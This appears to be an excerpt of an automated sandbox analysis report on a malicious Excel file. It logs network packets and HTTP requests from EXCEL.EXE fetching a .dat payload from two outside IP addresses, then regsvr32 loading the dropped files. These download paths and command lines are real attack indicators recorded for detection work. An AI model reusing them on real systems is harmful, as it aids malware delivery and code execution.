                Jun 25, 2021 18:28:47.070900917 CEST | 80 | 49167 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:47.567629099 CEST | 49167 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:28:47.652913094 CEST | 80 | 49167 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:48.160312891 CEST | 49167 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:28:48.246817112 CEST | 80 | 49167 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:48.249515057 CEST | 49168 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:28:48.338891029 CEST | 80 | 49168 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:48.846990108 CEST | 49168 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:28:48.936548948 CEST | 80 | 49168 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:49.439831972 CEST | 49168 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:28:49.529444933 CEST | 80 | 49168 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:28:49.550668955 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:28:49.756808043 CEST | 80 | 49169 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:28:49.757050991 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:28:49.757635117 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:28:49.963090897 CEST | 80 | 49169 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:28:50.560987949 CEST | 80 | 49169 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:28:50.561289072 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:28:50.581809044 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:28:50.647761106 CEST | 80 | 49170 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:28:50.647874117 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:28:50.648982048 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:28:50.714696884 CEST | 80 | 49170 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:28:50.962857962 CEST | 80 | 49170 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:28:50.963026047 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:29:55.562064886 CEST | 80 | 49169 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:29:55.562181950 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:29:55.962322950 CEST | 80 | 49170 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:29:55.962764025 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:30:46.865757942 CEST | 49170 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:30:46.866034985 CEST | 49169 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:30:46.933026075 CEST | 80 | 49170 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:30:47.072385073 CEST | 80 | 49169 | 190.14.37.3 | 192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.3
                • 185.183.99.120

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.22 | 49169 | 190.14.37.3 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Jun 25, 2021 18:28:49.757635117 CEST | 1 | OUT | GET /44372.7698814815.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.3
                Connection: Keep-Alive
                Jun 25, 2021 18:28:50.560987949 CEST | 2 | IN | HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:28:50 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.22 | 49170 | 185.183.99.120 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Jun 25, 2021 18:28:50.648982048 CEST | 2 | OUT | GET /44372.7698814815.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:28:50.962857962 CEST | 3 | IN | HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:29:05 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage


                Memory Usage


                High Level Behavior Distribution


                Behavior


                System Behavior

                General

                Start time:18:28:35
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fc20000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis
